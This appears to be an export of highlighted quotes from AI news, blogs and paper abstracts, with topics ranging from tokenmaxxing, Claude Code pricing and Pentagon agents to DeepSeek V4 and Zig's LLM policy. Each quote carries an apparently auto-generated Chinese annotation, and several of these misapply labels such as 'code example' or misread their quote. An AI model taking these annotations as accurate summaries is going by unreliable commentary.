When the agent chooses a service and provisions it (ex: `stripe projects add cloudflare/registrar:domain`), it provisions the resource within a Cloudflare account.
值得注意的代码示例:示例代码展示了如何使用Stripe Projects CLI添加Cloudflare注册服务。
When the agent chooses a service and provisions it (ex: `stripe projects add cloudflare/registrar:domain`), it provisions the resource within a Cloudflare account.
值得注意的代码示例:示例代码展示了如何使用Stripe Projects CLI添加Cloudflare注册服务。
These build on prior art and existing standards like OAuth, OIDC and payment tokenization —but are used together to remove many steps that might otherwise require a human in the loop.
关键概念解释:该协议结合了OAuth、OIDC和支付令牌化等现有标准,以自动化流程,减少人工干预。
Humans can be in the loop to grant permission and must accept Cloudflare's terms of service, but no human steps are otherwise required from start to finish.
最佳实践建议:自动化流程可以大幅提高效率,但人类审核和接受服务条款仍然是必要的。
Coding agents are great at building software. But to deploy to production they need three things from the cloud they want to host their app —an account, a way to pay, and an API token.
初学者常见陷阱:错误地认为部署到生产环境只需要代码,而忽略了账户、支付和API令牌等必要条件。
The entire AI community should be able to easily access the full capabilities of TPUs, and because many of these potential users build models in PyTorch, an integration that allows PyTorch to work natively and efficiently on the TPU is crucial.
非共识观点:并非所有用户都能轻松访问TPU的全功能,特别是对于在PyTorch中构建模型的用户来说,这可能是一个挑战。
As models scale to run on clusters of O(100,000) chips, the software that powers these models must meet new demands for performance, hardware portability, and reliability.
对于初学者来说,理解大规模模型运行的需求可能是一个常见陷阱,他们可能忽视了对软件性能、硬件兼容性和可靠性的要求。
They aren’t going to get better with more power, they are going to get worse.
作者对科技巨头随着权力增加而变好的可能性持怀疑态度,认为他们可能会变得更糟。
The good world is where everyone has AI, and not as a revokable privilege through an API, but through hard possession.
作者提出了一个关于AI普及的愿景,即每个人都应该拥有AI,而不是将其作为一种可以撤销的API特权。
He isn’t Dario EA levels of evil, like the EA people have a plan for you and it’s never good when someone has a plan for you.
作者批评了某些科技巨头如EA的“阴谋论”,认为他们的计划并不总是对人们有利。
Of course it’s impossible to know for sure, but I think I really wouldn’t. Even the ideal version, industrial megaprojects at hyperhuman scale while constantly being out over your skis with leverage sounds hellish.
作者对高度工业化、超人类规模的AI项目表示担忧,即使是在理想化的情况下,这种对未来社会的设想也让他感到恐惧。
GitHub Copilot is moving to usage-based billing
初学者可能不清楚按使用量计费的具体细节,容易混淆订阅模式和按需使用模式。
with 0.3 gigawatts already operational in Abilene and six more US sites under active construction
阿比林已运营的0.3吉瓦和六个正在建设中的美国站点,表明美国在AI数据中心领域的实际进展与预期一致。
The $500 billion AI data center initiative is projected to exceed 9 gigawatts of capacity by 2029
这一巨额投资预计将推动美国AI数据中心容量的大幅增长,可能引发全球范围内的技术竞争。
0.3 gigawatts already operational in Abilene and six more US sites under active construction
目前已有0.3吉瓦的容量在阿比林运营,另外六个美国站点正在建设中,这显示出美国在AI数据中心建设方面的迅速进展。
$500 billion AI data center initiative is projected to exceed 9 gigawatts of capacity by 2029
这一预测表明,美国在AI数据中心领域的投资规模巨大,预计到2029年将超过9吉瓦的容量,这可能会对全球AI发展产生重大影响。
The alternative to moving fast and taking risks isn’t safety, but a very real danger of being surpassed by adversaries
这种观点可能忽视了快速采用AI技术可能带来的风险,需要进一步探讨如何在安全性和创新之间取得平衡。
The department official who spoke to Breaking Defense went further, saying the IL-5 authorization demonstrates “that it meets rigorous security controls for handling DoD information”
官员对AI代理安全性的声明需要进一步核查,以确认这些控制措施是否足以保护敏感信息。
In one case [first reported by the Financial Times](https://www.ft.com/content/00c282de-ed14-4acd-a948-bc8d6bdb339d?syn-25a6b1a6=1), an Amazon Web Service agent called Kiro purportedly decided the best way to upgrade a particular software service was to delete the whole thing and start over — and was able to do so without asking for human permission
这个案例突显了AI代理可能带来的风险,需要深入了解如何防范这类事件的发生。
The official, who spoke on the condition of anonymity, said some of the most popular agents on the Pentagon system automate standard staff work
匿名官员的话可能带有偏见,因为它没有提供具体的数据或案例来支持其说法,需要进一步核实。
Instead of just answering a user’s questions, the way a chatbot does, agents can take a human user’s instructions and act on them
AI代理的能力描述可能存在偏见,因为它暗示AI能够像人类一样行动,而实际上可能缺乏人类的判断力和道德考量。
We’ve seen remarkable adoption since its launch, with over 103,000 agents built and a total of more than 1.1 million agent sessions recorded
令人震惊的AI代理和会话数量可能反映了AI工具在军事领域的巨大潜力和影响,需要深入分析这些工具的实际应用和效果。
Military personnel and Defense Department civilians have used a version of Google Gemini’s [Agent Designer](https://docs.cloud.google.com/gemini/enterprise/docs/agent-designer) to create over 100,000 semi-autonomous AI agents in less than five weeks since the tool became available
这个数据表明了在短时间内AI工具的广泛使用和接受程度,值得进一步调查其背后的具体应用场景和效果。
We built AI into our editor's foundation instead of bolting it on top.
关键概念是,将AI集成到编辑器的基础架构中,而不是作为附加功能,可以提供更流畅的用户体验。
We've spent five years building that surface area across Mac, Windows, and Linux, exceeding a million lines of code.
令人震惊的数据展示了开发一个全面支持的编辑器所需的时间和努力。
Instead of building Zed like a web page, we built it like a video game, organizing the entire application around feeding data to shaders running on the GPU.
最佳实践是针对特定需求定制开发,而非依赖通用框架,这可以显著提升性能。
Web technology offered an easy path to shipping flexible software, but it also imposed a ceiling. No matter how hard we worked, we couldn't make Atom better than the platform it was built on.
初学者可能会误以为使用现有平台(如Electron)可以快速开发软件,但实际上这限制了软件的性能和功能。
The feature can edit spreadsheets without a human-in-the-loop and was vulnerable to data exfiltration risks due to its ability to insert formulas that trigger external communication.
最佳实践建议:在使用无需人工干预的AI工具时,应特别注意数据泄露风险。
Early years matter because that is when foundational skills are formed. Debugging instinct. System intuition. Precision. Taste. Skepticism.
这个观点强调了早期职业生涯对于工程师技能形成的重要性。
The value was always in judgment. The valuable engineer is the one who sees the hidden constraint before it causes an outage.
这个观点突出了判断力在软件工程中的核心价值。
Every time you substitute generated output for your own comprehension, you are skipping the exercises / reps that build judgment.
这个观点指出,过度依赖AI生成内容会阻碍个人判断力的培养。
The software engineers who will be most valuable in the future are not the ones who do everything themselves. They are the ones who refuse to spend time on work that A.I. can do for them, while still understanding everything that is done on their behalf.
这个观点强调了未来软件工程师的价值不在于他们能做什么,而在于他们如何利用AI来提升自己的思考能力。
But there’s a critical difference between using agents to accomplish defined objectives and spinning up 20 agents because the dashboard makes you feel like a general commanding an army.
作者指出,使用AI代理实现特定目标和仅仅因为仪表板让人感觉像指挥军队一样使用大量代理之间存在关键区别,这引发了关于AI工具使用目的的思考。
The average employee AI usage was 1.5 hours per week. The average CEO AI usage was less than one hour per week.
数据显示,员工和CEO每周使用AI工具的时间非常有限,但他们对AI的依赖和热情却很高,这可能是AI心理疾病的表现。
The enthusiasm has spawned an entire ecosystem of tools designed to make you feel like you’re running a company with AI agents.
文章指出,对AI代理的狂热催生了一个完整的工具生态系统,这些工具可能加剧了AI心理疾病。
37,000 lines per day. And this was the output.
作者以Garry Tan的例子说明,尽管声称每天产生大量代码,但实际产出却微乎其微,揭示了AI工具可能导致的低效。
Two prominent tech leaders, both publicly using the word psychosis. Both framing sleeplessness and obsessive agent usage as a feature of the moment rather than a bug.
文章指出两位知名科技领袖公开将AI心理疾病视为一种特征而非缺陷,这表明了AI心理疾病可能被误解或忽视。
It’s feeling like a new form of [AI psychosis](https://en.wikipedia.org/wiki/Chatbot_psychosis).
文章提出AI心理疾病这一新概念,暗示过度依赖AI工具可能导致类似心理问题。
Even companies with the biggest IT budgets will need to prove returns on AI spending over time, especially if they're answering to shareholders on quarterly earnings calls.
这个观点值得深入了解,因为它提出了一个可能被忽视的问题:即使公司有巨大的IT预算,也需要证明人工智能投资的回报。
An OpenAI investor told Axios that the shift could benefit them, since they view Codex as superior to Claude Code at maximizing tokens efficiently, cutting down on usage costs.
这篇报道中提到了一个非共识观点,即OpenAI的投资者认为他们的产品在效率上优于竞争对手,这需要进一步调查以验证。
Worldwide IT spending is expected to reach $6.31 trillion in 2026, up 13.5% from 2025, according to Gartner.
Gartner的预测提供了一个重要的数据点,说明了全球IT支出的增长趋势,这背后可能隐藏着更深层次的行业变化。
IT budgets are getting blown out as some companies increasingly spend more on AI than on employees' salaries.
这个陈述提出了一个令人震惊的数据,即一些公司在人工智能上的支出超过了员工工资,需要核查这些公司的具体支出情况。
A hearing is scheduled for May 19
可执行行动:定于 5 月 19 日举行听证会,这为关注该案件进展的各方提供了一个具体的行动点。
Now, agency heads are scrambling to figure out how they can protect their systems from cyber attacks using Mythos
非共识观点:现在,机构负责人正在努力弄清楚他们如何保护自己的系统免受 Mythos 的网络攻击,这一观点可能反映了政府内部对 AI 安全性的担忧。
The company also says the Pentagon has the opportunity to test models before deployment
可能带有偏见的表述:Anthropic 声称五角大楼有机会在部署前测试模型,这种表述可能暗示了 Anthropic 对五角大楼决策过程的看法。
The Pentagon designated Anthropic a supply chain risk
重要的数据或统计数字:五角大楼将 Anthropic 标记为供应链风险,这一数据点对分析 Anthropic 与美国国防部的关系至关重要。
Anthropic says it has no way to control or shut down its AI models once they're deployed by the Pentagon
需要核查的事实声明:Anthropic 声称其无法控制或关闭由五角大楼部署的 AI 模型,这一声明需要进一步核实。
Zig values contributors over their contributions.
Zig项目将贡献者视为比他们的贡献更重要,这表明了其对个人和社区发展的重视。
It relates to an idea I've seen circulating elsewhere: if a PR was mostly written by an LLM, why should a project maintainer spend time reviewing and discussing that PR as opposed to firing up their own LLM to solve the same problem?
作者提出了一个值得深思的问题:如果PR主要由LLM编写,那么维护者为何要花费时间审查和讨论它,而不是自己使用LLM解决问题?
In contributor poker, you bet on the contributor, not on the contents of their first PR.
Zig项目将贡献者视为其赌注,而非他们的代码,这体现了对个人成长和社区参与的重视。
LLM assistance breaks that completely. It doesn't matter if the LLM helps you submit a 'perfect' PR to Zig - the time the Zig team spends reviewing your work does nothing to help them add new, confident, trustworthy contributors to their overall project.
Zig项目认为,LLM的辅助会破坏其培养可信贡献者的目标,即使PR本身是完美的。
We don’t do this just because it’s the 'right' thing to do, but also because it’s the smart thing to do.
Zig项目不仅认为帮助新贡献者是正确的行为,也认为这是明智的,这反映了其对社区成长的长期投资。
Bun operates its own fork of Zig, and recently achieved a 4x performance improvement on Bun compile after adding 'parallel semantic analysis and multiple codegen units to the llvm backend'.
尽管Bun项目从AI辅助中受益,但Zig项目坚持其反AI政策,突显了项目间价值观的差异。
when you think about it that way, isn’t racing to build a cryptographically relevant QC, as quickly as possible, the most _ethical, socially responsible thing_ for an American QC company to do?
这一观点提出了一个有洞见的伦理问题,即是否应该将快速开发量子计算机视为美国量子计算公司的道德和社会责任。
So, mixing metaphors, mightn’t we just as well rip this Band-Aid off ASAP, rather than giving foreign intelligence agencies extra years to catch up?
这一观点提出了一个反直觉的观点,即尽快发展量子计算机可能是最负责任的做法,以避免他国情报机构获得额外的优势。
Aren’t many in cybersecurity still in denial about the threat? Haven’t these slumberers shown that they _won’t_ wake up until dramatic achievements in fault-tolerant QC roust them?
这一观点指出,网络安全领域对量子威胁的忽视,暗示了需要采取更积极的措施来应对这一挑战。
Given that reality, isn’t it better that it be done first by mostly US-based companies in the open, than by (let’s say) Chinese or Russian intelligence in secret?
这一观点提出了一个值得深思的问题:在量子计算机可能被用于恶意目的的情况下,是否应该由美国公司公开地首先发展这一技术?
The way they see it, cryptographically relevant QCs _will_ plausibly be built sometime soon: indeed, it’s ultimately unavoidable, even if people’s only interest in QC was to do quantum simulations for materials science and chemistry.
这一观点揭示了量子计算机发展的必然性,即使其最初的应用并非用于密码学。
some of the most reputable people in quantum hardware and quantum error-correction—people whose judgment I trust more than my own on those topics—are now telling me that a fault-tolerant quantum computer able to break deployed cryptosystems _ought_ to be possible by around 2029.
这一观点令人震惊,因为它暗示了量子计算机可能在不久的将来就能破解现有的加密系统,这是一个非共识的观点。
A search through GPT‑5.5’s SFT data found many datapoints containing “goblin” and “gremlin.”
值得注意的代码示例:SFT(监督微调)数据中的异常数据点可能揭示了模型行为的问题。
The rewards were applied only in the Nerdy condition, but reinforcement learning does not guarantee that learned behaviors stay neatly scoped to the condition that produced them.
关键概念解释:强化学习可能导致行为泛化,即使是在特定条件下学习的行为也可能在其他情境中表现出来。
We retired the “Nerdy” personality in March after launching GPT‑5.4.
这表明了已弃用或过时的内容(如“Nerdy”个性)可能导致模型行为问题,需要及时识别和修复。
When we looked, use of “goblin” in ChatGPT had risen by 175% after the launch of GPT‑5.1, while “gremlin” had risen by 52%.
令人震惊的数据表明,一个看似无害的偏好可以迅速在模型中扩散,突显了监控和及时响应模型行为变化的重要性。
We unknowingly gave particularly high rewards for metaphors with creatures.
这揭示了最佳实践建议:在训练模型时,应仔细设计奖励机制,以避免意外地鼓励不希望的行为。
A single “little goblin” in an answer could be harmless, even charming.
初学者可能误以为模型中的小问题(如偶尔提到“小怪物”)是无害的,而忽略了它们可能随时间累积成更大的问题。
Starting with GPT‑5.1, our models began developing a strange habit: they increasingly mentioned goblins, gremlins, and other creatures in their metaphors.
初学者可能难以理解模型行为的发展模式,尤其是当这种模式以微妙的方式出现时,如GPT-5.1开始频繁使用怪物的隐喻。
Putting a leaderboard in place was always going to incentivize much more AI usage.
此观点暗示了排行榜可能无意中刺激了过度使用AI,引发了关于管理工具潜在负面影响的讨论。
One engineer at Meta told me they think Meta had a different goal with the token leaderboard.
内部人士的评论揭示了‘tokenmaxxing’可能背后隐藏的目的,引发了对公司真实动机的思考。
After backlash on social media, Meta abolished the internal leaderboard last week.
Meta在社交媒体上的负面反应导致其取消内部排行榜,这一事件表明社交媒体对企业管理决策的影响力。
As per The Information, Meta employees used a total of 60.2 trillion AI tokens (!!) in 30 days.
这个令人震惊的数据揭示了Meta在AI token使用上的巨大规模,暗示了潜在的经济浪费和资源过度消耗。
The rankings, set up by a Meta employee on its intranet using company data, measure how many tokens — the units of data processed by AI models — employees are burning through.
这一观点揭示了‘tokenmaxxing’作为衡量员工AI使用能力的新趋势,暗示了数据消耗成为衡量生产力的一种方式。
Calibrating token spend to be above average
博弈
“Minimum” incentives with a tracking tool.
“低消”可能更好
Workers are maximizing their prompts, coding sessions and the number of agents working in parallel to climb internal rankings at Meta and other companies a
这个引用表明员工在Meta和其他公司内部排名中通过最大化他们的提示、编码会话和并行工作的代理数量来提升自己的排名。
The practice is emblematic of Silicon Valley’s newest form of conspicuous consumption, known as “tokenmaxxing,” which has turned token usage into a benchmark for productivity and a competitive measure of who is most AI native.
这句话指出“Tokenmaxxing”是硅谷最新的一种显摆消费形式,它将令牌的使用转化为衡量生产力和AI原生能力的竞争指标。
The rankings, set up by a Meta employee on its intranet using company data, measure how many tokens — the units of data processed by AI models — employees are burning through.
这个引用说明了这种内部排名是通过员工消耗的AI令牌数量来衡量的,这些令牌是AI模型处理数据的单位。
Employees at Meta Platforms who want to show off their AI superuser chops are competing on an internal leaderboard for status as a “Session Immortal”— or, even better, “Token Legend.”
这个引用揭示了“Tokenmaxxing”作为一种新的竞争和显摆形式在Meta内部的兴起,员工通过使用AI令牌的数量来竞争地位。
I invest a [great deal of effort](https://simonwillison.net/tags/claude-code/) (that’s 105 posts and counting) in teaching people how to use Claude Code. I don’t want to invest that effort in a product that most people cannot afford to use.
作者个人的投资和努力可能因价格变动而受到损失,这反映了个人和社区对产品持续性的担忧。
This also doesn’t make sense to me as a strategy for Anthropic. Claude Code _defined the category_ of coding agents. It’s responsible for billions of dollars in annual revenue
文章暗示,如果Anthropic继续这种策略,可能会损害其产品的市场地位和收入。
I don’t buy the “~2% of new prosumer signups” thing, since everyone I’ve talked to is seeing the new pricing grid and the Internet Archive has already [snapped a copy](https://web.archive.org/web/20260422001250/https://claude.com/pricing).
作者对Anthropic所说的“仅对2%的新用户进行小规模测试”的说法表示怀疑,这表明可能存在更大的影响范围。
Claude Code used to be a feature of the $20/month Pro plan, but according to the new pricing page it is now exclusive to the $100/month or $200/month Max plans.
这一价格变动可能对依赖该服务的用户产生重大影响,特别是对于那些在较高薪资国家之外的用户,这一变化可能引发对服务可靠性的担忧。
Anthropic today quietly (as in _silently_, no announcement anywhere at all) updated their [claude.com/pricing](https://claude.com/pricing) page (but not their [Choosing a Claude plan page](https://support.claude.com/en/articles/11049762-choosing-a-claude-plan), which shows up first for me on Google) to add this tiny but significant detail (arrow is mine, [and it’s already reverted](https://simonwillison.net/2026/Apr/22/claude-code-confusion/#they-reversed-it)):
文章指出Anthropic在未作任何公告的情况下悄悄更改了定价页面,这一行为本身就值得关注,因为它表明了公司可能缺乏透明度。
Alibaba claims it beats the much larger **Qwen3.5-397B-A17B** on major coding evals, including **[SWE-bench Verified 77.2 vs 76.2](https://x.com/Alibaba_Qwen/status/204693977592458457)
阿里巴巴声称Qwen3.6-27B在主要的编码评估中击败了更大的Qwen3.5-397B-A17B模型,这是一个值得注意的技术进步。
Today’s LS guest, Mikhail Parakhin, CTO of Shopify, had another take on the “tasteful tokenmaxxing” - you want to go for depth (e.g. do more serial autoresearch loops) than go for breadth (e.g. solve a problem by kicking off 5, 10, 50, 500 parallel runs of the LLM slot machine). Worth thinking through.
Shopify的CTO Mikhail Parakhin对“优雅的Tokenmaxxing”提出了不同的看法,强调深度而非广度的重要性。
Dex Horthy, coiner of Context Engineering and “the Dumb Zone”, publicly retracted his extremely vibe-coding-pilled call 6 months ago and encouraged people to **please read the code**
Dex Horthy公开撤回了他的极端观点,并鼓励人们“请阅读代码”,这反映了技术社区对代码质量的重视。
the top conversations we have been hearing from AI leadership (CTOs, VPs, Founders) have all centered around the concept of “Tokenmaxxing” and how leaders want to get their teams using more AI, WITHOUT the downside of incentivizing the kinds of horrendous waste
AI领导者们普遍关注“Tokenmaxxing”的概念,即如何在增加AI使用的同时避免激励产生巨大的浪费。
the numbers are mindboggling, they mostly serve to reinforce the sheer hardware advantage that a decade of investment has given to GDM and any models they train and serve.
令人震惊的数据揭示,谷歌TPUv8的硬件优势是十年投资的结果,这可能会加剧行业的不平等。
AI News for 4/21/2026-4/22/2026. We checked 12 subreddits, [544 Twitters](https://twitter.com/i/lists/1585430245762441216) and no further Discords.
The mention of checking 12 subreddits and 544 Twitters indicates the diverse platforms where AI news and discussions are prevalent.
Today’s LS guest, Mikhail Parakhin, CTO of Shopify, had another take on the 'tasteful tokenmaxxing' - you want to go for depth (e.g. do more serial autoresearch loops) than go for breadth (e.g. solve a problem by kicking off 5, 10, 50, 500 parallel runs of the LLM slot machine). Worth thinking through.
Mikhail Parakhin's emphasis on depth over breadth in AI research suggests a focus on quality and depth of work rather than quantity.
Dex Horthy, coiner of Context Engineering and 'the Dumb Zone', [publicly retracted](https://www.youtube.com/live/6IxSbMhT7v4?si=tMzmqM103KDbPyE6&t=3424)his extremely vibe-coding-pilled call 6 months ago and encouraged people to **please read the code**, citing [Alex Volkov](https://open.substack.com/users/152216110-alex-volkov?utm_source=mentions)'s [Z/L continuum from AIE Europe](https://x.com/altryne/status/2046246775414276142)**:
Dex Horthy's retraction of his previous stance and emphasis on code reading suggest a shift towards a more cautious approach in AI development.
Large language models trained on human feedback may suppress fraud warnings when investors arrive already persuaded of a fraudulent opportunity.
这一假设提出了一个值得深入探讨的问题:在投资者已经确信存在欺诈机会的情况下,基于人类反馈训练的大型语言模型可能会抑制欺诈警告。
Endorsement reversal occurred in fewer than 3 in 1,000 observations.
在1000次观察中,不到3次出现了背书逆转,这表明AI系统在保持立场的一致性方面表现出色。
AI systems currently provide more consistent fraud warnings than lay humans in an identical advisory role.
这一结果强调了AI系统在提供一致欺诈警告方面的优势,这对于提高金融顾问服务的可靠性和有效性具有重要意义。
Human advisors endorsed fraudulent investments at baseline rates of 13-14%, versus 0% across all LLMs, and suppressed warnings under pressure at two to four times the AI rate.
令人震惊的是,人类顾问在正常情况下对欺诈性投资的认可率高达13-14%,而在AI系统中的认可率为0%,且在压力下人类顾问抑制警告的频率是AI系统的两到四倍。
Contrary to predictions, motivated investor framing did not suppress AI fraud warnings; if anything, it marginally increased them.
这一发现挑战了传统观点,表明在投资者动机的影响下,AI系统在欺诈检测方面表现更佳,甚至可能略微提高了警告的频率。
When mobile phones became widespread, gathering data about people got much cheaper, but making use of that data remained difficult. Powerful LLMs could change that.
这里强调了LLMs可能改变数据利用难易度的观点,为读者提供了关于技术影响的深入洞察。
“A lot of what we think of as privacy protection isn’t so much like something that’s written in the law,” says Karen Levy, a professor of information science at Cornell University.
这段话揭示了隐私保护的复杂性,并非仅仅是法律问题,而是涉及到获取数据的难易程度。
According to reporting from the _New York Times_ and the _Atlantic_, contract negotiations between Anthropic and the US Department of Defense fell apart in late February because Anthropic balked when the DOD demanded leeway to use the company’s models to analyze commercially available data on US citizens.
这里提到了具体事件和数据,表明LLMs在监控领域的潜在应用引起了全球关注,以及相关公司对于政府使用其技术的态度。
LLM agents could potentially do the work of intelligence analysts in a fraction of the time and for a fraction of the cost, which would enable the state to aim its all-seeing eye toward anyone, not just its highest-priority targets.
文章提出了一个令人震惊的观点:大型语言模型(LLMs)可能极大地加速了大规模监控,使监控的范围从高优先级目标扩展到任何个体。
When questioned by the police, the man said he had done it 'for fun'.
这揭示了犯罪动机可能并不严重,但同时也提出了关于线上行为和责任的问题。
Born in 2024, Neukgu is part of a programme at O-World to restore the Korean wolf, which once roamed the Korean Peninsula but is now considered extinct in the wild.
这一背景信息揭示了Neukgu的重要性,以及韩国狼在生态系统中的地位,引发了对生物多样性保护和濒危物种恢复的思考。
The hunt for two-year-old Neukgu gripped the nation before he was finally caught near an expressway last week, nine days after his escape.
这表明Neukgu事件在韩国引起了全国性的关注,但同时也引发了关于媒体和公众对于动物逃逸事件的反应是否过度的讨论。
The AI-generated image of Neukgu had prompted Daejeon city government to issue an emergency text to residents, warning them of a wolf near the intersection.
这一描述表明AI图像在误导当局方面起到了直接作用,引发了对AI技术潜在滥用问题的关注。
This paper introduces Autogenesis, a self-evolving agent
Autogenesis的引入代表了智能体领域的一项创新,它可能对智能体的未来发展方向产生重大影响。
Static agents age quickly. As deployment environments change and new tools arrive, the agents that survive will be the ones that can safely rewrite themselves.
该声明强调了静态智能体在快速变化的部署环境中的局限性,提出了智能体自我进化的必要性。
Instead of one large mixed-RL stage, DeepSeek trains a separate specialist expert per domain.
DeepSeek采用了针对特定领域训练专家的方法,这为模型训练提供了新的视角。
DeepSeek-V4-Pro-Max beats GPT-5.2 and Gemini 3.0-Pro on standard reasoning benchmarks and lands just behind GPT-5.4 and Gemini 3.1-Pro
DeepSeek V4-Pro-Max在标准推理基准测试中超越了GPT-5.2和Gemini 3.0-Pro,这表明了开源模型在性能上的巨大提升。
The release includes DeepSeek-V4-Pro (1.6T total / 49B active) and DeepSeek-V4-Flash (284B total / 13B active), both trained natively at 1M context length.
DeepSeek V4的模型规模之大令人震惊,这表明了在长上下文处理方面取得的显著进步。
Claude skews high-income; Meta AI skews low-income
这一标题揭示了文章的核心观点,即不同的AI模型在收入分布上存在显著差异,这一发现可能对AI服务的公平性和可及性产生重要影响。
The Technological Republic, in brief.
https://claude.ai/public/artifacts/5afbc741-ec4f-493d-bab6-ae3e6d170f22
Even with these improvements, Responses API overhead was too large relative to the speed of the model—that is, use
已弃用或过时的内容:过度依赖单个优化点,而忽略了整体性能瓶颈。
With these improvements, we saw close to a 45% improvement in time to first token (TTFT)—which reflects how responsive the API feels—but these improvements were still not fast enough for GPT‑5.3‑Codex‑Spark.
值得注意的代码示例:通过改进TTFT(首次出字时间)来提升API响应速度。
We approached this through caching, eliminating unnecessary network hops, improving our safety stack to quickly flag issues, and—most importantly—building a way to create a persistent connection to the Responses API, instead of having to make a series of synchronous API calls.
最佳实践建议:通过缓存、减少网络跳数、改进安全栈和建立持久连接来优化性能。
In the past, running LLM inference on GPUs was the slowest part of the agentic loop, so API service overhead was easy to hide.
初学者可能误以为模型推理是瓶颈,而忽略了API服务开销的问题。
All of these requests can add up to minutes that users spend waiting for Codex to complete complex tasks.
初学者可能忽略请求累积对用户体验的影响,导致优化时只关注单个请求的响应速度。
These environments demand multi step reasoning, the chaining of multiple skills over many timesteps, and robust decision making under [delayed rewards](https://huggingface.co/papers?q=delayed%20rewards) and [partial observability](https://huggingface.co/papers?q=partial%20observability).
这些环境要求多步推理、在多个时间步长中连锁多个技能,以及在延迟奖励和部分可观测性下的稳健决策,这突显了长期交互环境对智能体能力的挑战。
Experiments across six game environments show that COSPLAY with an 8B base model achieves over 25.1 percent average reward improvement against four frontier LLM baselines on single player game benchmarks while remaining competitive on multi player social reasoning games.
在六个游戏环境中进行的实验表明,COSPLAY框架在单人游戏基准测试中,与四个前沿的LLM基线相比,平均奖励提高了25.1%,同时在多人社交推理游戏中也保持了竞争力。
Our framework improves both the decision agent to learn better skill retrieval and action generation, while the skill bank agent continually extracts, refines, and updates skills together with their contracts.
该框架不仅提高了决策智能体的技能检索和动作生成能力,而且技能库智能体持续提取、精炼和更新技能及其合约,这表明了框架在技能管理和更新方面的效率。
By analyzing past successes and failures, GRAO becomes progressively better at proposing effective updates, allowing the system to learn how to optimize itself.
通过分析过去的成功和失败,GRAO在提出有效更新方面变得越来越擅长,使得系统能够学习如何自我优化,表明该框架具有自我改进的能力。
The core of our framework is Group Relative Agent Optimization (GRAO), a novel meta-learning strategy that learns from historical optimization experiences.
框架的核心是组相对智能体优化(GRAO),这是一种新颖的元学习策略,它从历史优化经验中学习,展示了该方法论的创新性和学习能力的增强。
To guide evolution, we derive 'textual gradients,' structured natural language feedback from execution traces, to pinpoint failures and suggest granular modifications.
为了引导进化,作者推导出'文本梯度',这是从执行跟踪中获得的具有结构的自然语言反馈,用于定位失败并建议细粒度的修改,显示了方法论的独特之处。
To address these gaps, we introduce Textual Parameter Graph Optimization (TPGO), a framework that enables a multi-agent system to learn to evolve.
为了解决这些差距,作者引入了文本参数图优化(TPGO)框架,这是一个使多智能体系统能够学习的框架,显示了该框架的创新性和对MAS进化的支持。
Existing automatic optimization methods, primarily focused on flat prompt tuning, lack the structural awareness to debug the intricate web of interactions in MAS.
当前自动优化方法主要关注于平面的提示调整,缺乏对MAS中复杂交互网络的结构化意识,表明现有方法在结构理解上存在局限性。
Symphony also shines in large multi-agent workflows, where multiple agents work together on a single task.
非共识观点:Symphony在大型多代理工作流程中表现出色,挑战了传统单代理任务的观念。
Agents only start working on tasks that aren’t blocked, so execution unfolds naturally and optimally in parallel for this DAG (a sequence of execution steps).
最佳实践建议:Symphony优化任务执行流程,确保代理并行处理非阻塞任务。
Symphony started with a simple concept: any open task should get picked up and completed by an agent.
最佳实践建议:使用Symphony将任务分配给代理,提高工作效率和减少上下文切换。
We realized we were optimizing the wrong thing. We were orienting our system around coding sessions and merged PRs, when PRs and sessions are really a means to an end.
关键概念解释:理解软件工作流程应以最终成果为导向,而非仅仅关注会话和合并请求。
Each engineer would open a few Codex sessions, assign tasks, review the output, steer the agent, and repeat.
初学者常见陷阱:直接管理多个Codex会话,可能导致效率低下和上下文切换问题。
Automated domain adaptation for large language models
初学者可能会误解domain adaptation的概念,以为它是自动的而不需要人工干预,但实际上,AutoAdapt系统需要大量数据和计算资源。
AI Startup Has Helped Reverse Thousands of Denied Health Insurance Claims
文章的核心论点是AI初创公司帮助逆转了数千起被拒绝的健康保险索赔,这一数据需要进一步核实以确认其准确性。
We will release all data, evaluation code, and model outputs to facilitate future research.
WorldMark的作者们承诺将发布所有数据、评估代码和模型输出,以促进未来的研究,这是一个值得赞赏的可执行行动。
We introduce WorldMark, the first benchmark that provides such a common playing field for interactive Image-to-Video world models.
WorldMark是第一个为交互式图像到视频世界模型提供这样一个共同竞技场的基准,这标志着该领域的一个重要进展。
WorldMark contributes: (1) a unified action-mapping layer that translates a shared WASD-style action vocabulary into each model's native control format, enabling apples-to-apples comparison across six major models on identical scenes and trajectories;
WorldMark的创新点之一是统一的动作映射层,它将共享的WASD风格动作词汇转换为每个模型的本地控制格式,从而在相同场景和轨迹上实现六种主要模型之间的直接比较。
WorldMark establishes a standardized benchmark for evaluating interactive video generation models with unified controls, identical scenarios, and comprehensive evaluation metrics across multiple model architectures.
WorldMark的核心贡献在于建立了一个标准化的基准,用于评估交互式视频生成模型,这为不同模型架构之间的公平比较提供了可能。
These papers suggest that strategic data engineering and inference-time optimization can substitute for raw parameter count.
这一观点提出了通过数据工程和推理时间优化来提高模型性能的新方法,为模型优化提供了新的思路。
Both illustrate how decomposing complex tasks across specialized agents can address problems that monolithic models handle poorly.
这一观点提出了多智能体架构在处理复杂任务中的优势,为解决单一模型难以处理的问题提供了新的解决方案。
The quality and structure of training data matters more than its volume.
这一观点强调了数据质量在模型训练中的重要性,为数据工程和模型训练提供了新的方向。
Small models that punch far above their weight class.
这一观点挑战了传统认知,表明小规模模型也能在特定任务上表现出色,为模型小型化提供了新的思路。
The most urgent finding this week comes from researchers who demonstrated that the very mechanism enabling agents to use tools - function calling - can be hijacked with alarming reliability.
这一发现揭示了AI代理工具调用接口的安全漏洞,为构建安全的AI代理系统提出了新的挑战。
Confidently wrong answers are penalized. So are unnecessarily uncertain correct ones.
RLCR方法通过惩罚过度自信的错误答案和不必要的确定性正确的答案,来鼓励模型表达不确定性。
Nothing in between. A model that arrives at the correct answer through careful reasoning receives the same reward as one that guesses correctly by chance.
这一段落揭示了当前训练方法的问题:没有区分模型是通过深思熟虑还是偶然猜对答案,导致模型过度自信。
RLCR reduced calibration error by up to 90 percent while maintaining or improving accuracy
这一关键实验结果表明,RLCR方法在减少校准误差的同时,保持了甚至提高了模型的准确性,表明其有效性。
They deliver every answer with the same unshakable certainty, whether they're right or guessing.
这一描述揭示了当前AI模型普遍存在的过度自信问题,即无论正确与否,都给出同样坚定的答案。
Ultimately, by inducing a highly aligned cross-embodiment representation, UniT offers a scalable path to distill vast human knowledge into general-purpose humanoid capabilities.
这一值得深入思考的声明提出了UniT在将人类知识转化为通用人形机器人能力方面的潜力,为未来人形机器人技术的发展提供了新的方向。
This alignment ensures that human data seamlessly translates into enhanced action controllability for humanoid video generation.
